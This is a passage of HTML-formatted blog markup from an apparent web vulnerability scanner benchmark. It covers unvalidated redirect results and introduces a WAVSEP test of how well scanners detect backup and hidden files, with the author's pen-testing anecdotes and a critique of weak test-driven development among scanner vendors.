&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYdCoKr-Db8kQ7QPe79OuJX6qWCt95pERDTltcyETU0HVde5_GCxaorETGNymiKdFR4OseWEWBg6r93vWhikpbNVoFYAxGWn_VNs4aFfrKlmbObTn7C5t_-4_z45L4-y8mVLx7KO8rxTQ/s1600/%25288%2529+Test+3-+Opensource+-+Unvalidated+Redirect.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYdCoKr-Db8kQ7QPe79OuJX6qWCt95pERDTltcyETU0HVde5_GCxaorETGNymiKdFR4OseWEWBg6r93vWhikpbNVoFYAxGWn_VNs4aFfrKlmbObTn7C5t_-4_z45L4-y8mVLx7KO8rxTQ/s1600/%25288%2529+Test+3-+Opensource+-+Unvalidated+Redirect.png&quot; height=&quot;170&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;
&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;
&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Unvalidated Redirect Detection Accuracy of Scanners –
Unified List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_21&quot;
 o:spid=&quot;_x0000_i1051&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:415.5pt;height:236.25pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image031.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXEzQ71kHkPIAqamZt2chAB_92oWELe7-xDMUES4hyphenhyphenA8i67Ok7nsvUXfuFAmYKMGs6p1XC92RfHQwtI8pG8Klwg_V4WOW-amyVNHxMifd2oV8TajlclLP1vJ0qnoVwJxNYnn4mmxfFU80/s1600/%25289%2529+Test+3-+Unified+-+Unvalidated+Redirect.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXEzQ71kHkPIAqamZt2chAB_92oWELe7-xDMUES4hyphenhyphenA8i67Ok7nsvUXfuFAmYKMGs6p1XC92RfHQwtI8pG8Klwg_V4WOW-amyVNHxMifd2oV8TajlclLP1vJ0qnoVwJxNYnn4mmxfFU80/s1600/%25289%2529+Test+3-+Unified+-+Unvalidated+Redirect.png&quot; height=&quot;362&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;11. Test IV - Backup/Hidden File Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The fourth assessment criterion was the detection accuracy
of &lt;b&gt;Old, Backup and Unreferenced Files&lt;/b&gt;, a &lt;b&gt;very&lt;/b&gt; common exposure,
that may lead to source code and configuration theft, which is also a commonly
implemented feature in web application scanners, and once again, a &lt;b&gt;NEW&lt;/b&gt; &lt;b&gt;TEST&lt;/b&gt;
in WAVSEP which the vendors were not aware of prior to the publication of this
article.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;This is also the test in which the results are MOST
SURPRISING.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;To make it clear, this test assessed the capabilities of
scanners to locate &lt;b&gt;backup&lt;/b&gt; files with non-executable extensions, &lt;b&gt;compressed&lt;/b&gt;
versions of files and directories that developers may have forgotten, &lt;b&gt;sequential&lt;/b&gt;
files or &lt;b&gt;copies&lt;/b&gt; of files and directories that are remnants of various
development tests, and additional hazards that may lead to source code
configuration disclosure.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;For those of you that doubt the importance of this vector, it&#39;s
an exposure that as a pen-tester I personally abused to download the &lt;b&gt;entire
source code&lt;/b&gt; of banks, e-commerce web sites, and credit card companies, &lt;b&gt;obtained
connection strings&lt;/b&gt; and &lt;b&gt;hard-coded credentials&lt;/b&gt; from obsolete source
code fragments and &lt;b&gt;configuration files&lt;/b&gt;, as well as located numerous &lt;b&gt;hidden
entry points&lt;/b&gt; that were vulnerable to exposures that the rest of the
application was not prone to.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;What I&#39;m trying to say is that while some instances of this
exposure may yield insignificant results, some severe instance could mean the
&quot;&lt;b&gt;game is over&lt;/b&gt;&quot; for the application, and expose every server
side vulnerability or hidden credential to the attacker.&lt;br /&gt;
&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;
&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #000000; border-collapse: collapse; border: none; mso-background-themecolor: accent1; mso-background-themetint: 102; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Back in the old days, I used a collection of tools and
  lists to identify such issues;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I made heavy use of &lt;a href=&quot;http://research.sensepost.com/tools/web/wikto&quot;&gt;Sensepost&#39;s Wikto&lt;/a&gt;
  with customized lists of files and extensions; I used the backup/hidden
  file detection features of the earliest published version of W3AF to download
  the source code of several banks, and from time to time, even suffered
  through the false positives of the mythical Paros Proxy obsolete file
  detection features.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;However, since then, many open source and commercial tools
  mastered those attacks, and tried to make the detection task easier.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;But as the &lt;b&gt;results&lt;/b&gt; &lt;b&gt;obviously&lt;/b&gt; &lt;b&gt;show&lt;/b&gt;,
  something &lt;b&gt;bad&lt;/b&gt; happened along the way, which is not necessarily related
  to this specific vulnerability, as much as it is related to a &lt;b&gt;major
  problem&lt;/b&gt; that &lt;b&gt;affects&lt;/b&gt; the &lt;b&gt;entire&lt;/b&gt; automated vulnerability
  detection &lt;b&gt;industry&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Insufficient Implementation of&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 48.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;TDD&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;If there&#39;s any obvious conclusion that the reader can
  conclude from this benchmark, this is probably it:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The is a serious problem in (and therefore insufficient
  use of) implementations of &lt;b&gt;TDD&lt;/b&gt; in the development of many web
  application vulnerability scanners:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Test-driven_development&quot;&gt;T&lt;span style=&quot;font-weight: normal;&quot;&gt;est &lt;/span&gt;D&lt;span style=&quot;font-weight: normal;&quot;&gt;riven
  &lt;/span&gt;D&lt;span style=&quot;font-weight: normal;&quot;&gt;evelopment&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; is a development process in which the software developers
  invest efforts in writing unit tests for code modules, often even prior to
  writing the modules themselves, and in which the build process of the product
  uses these tests to verify the code modules function properly, and that there
  aren&#39;t any unexpected behaviors.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;TDD is usually very costly to implement, but in my
  opinion, pays in the long run – and in many aspects.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Now don&#39;t get me wrong, I&#39;m &lt;b&gt;certain&lt;/b&gt; that almost all
  vendors use TDD to some extent, however, after experiencing what I have in
  this benchmark, I&#39;m also certain its probably insufficient (at least for some
  products).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;And honestly, I find it &lt;b&gt;very hard&lt;/b&gt; to &lt;b&gt;blame&lt;/b&gt; the
  vendors.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Allow me to elaborate:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;There is a lot of competition in this product category,
  and new features are often rushed to market as soon as possible. It also
  takes a major effort to write &lt;b&gt;unit-tests&lt;/b&gt; that include &lt;b&gt;network
  communication and scanning, &lt;/b&gt;and &lt;b&gt;to review the results&lt;/b&gt;, even for a
  single vulnerability detection plugin.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although it makes sense that the same outcome could be
  accomplished using &lt;b&gt;&lt;i&gt;traditional QA processes&lt;/i&gt;&lt;/b&gt;, which may very
  well be true for small-mid scale projects, one need only to look at the &lt;b&gt;insane
  number of plugins&lt;/b&gt; and &lt;b&gt;features&lt;/b&gt; in products like &lt;b&gt;Qualys&lt;/b&gt;, &lt;b&gt;Appscan&lt;/b&gt;,
  &lt;b&gt;Webinspect&lt;/b&gt; and &lt;b&gt;W3AF&lt;/b&gt;, to understand the futility of leaving all
  the testing to humans.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Imagine how much effort it would take to manually test
  that &lt;b&gt;200&lt;/b&gt; generic detection plugins function properly… Implementing
  unit-tests for all those modules isn&#39;t a small investment as well.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;And &lt;b&gt;what about 50000&lt;/b&gt; &lt;b&gt;signature-based&lt;/b&gt; product
  specific &lt;b&gt;vulnerabilities&lt;/b&gt;? How long will it take to manually test that (or
  develop unit-tests to verify) those features work?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;During the testing process, I have seen plugins in &lt;b&gt;several
  tools&lt;/b&gt; which were actually &lt;b&gt;named&lt;/b&gt; &lt;b&gt;after&lt;/b&gt; the various &lt;b&gt;extensions&lt;/b&gt;
  of &lt;b&gt;obsolete&lt;/b&gt; files I was trying to detect in WAVSEP, and still,
  scanning the platform with some or all of them did not yield results for many
  tools.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;My assumption is that the same problem is also responsible
  for the results of tools that got &lt;b&gt;100%&lt;/b&gt; in previous benchmarks, and got
  different results in this bulk of tests, even though the testing framework
  (WAVSEP/WIVET) did not include any changes in the test cases scanned.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;My Assumption:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
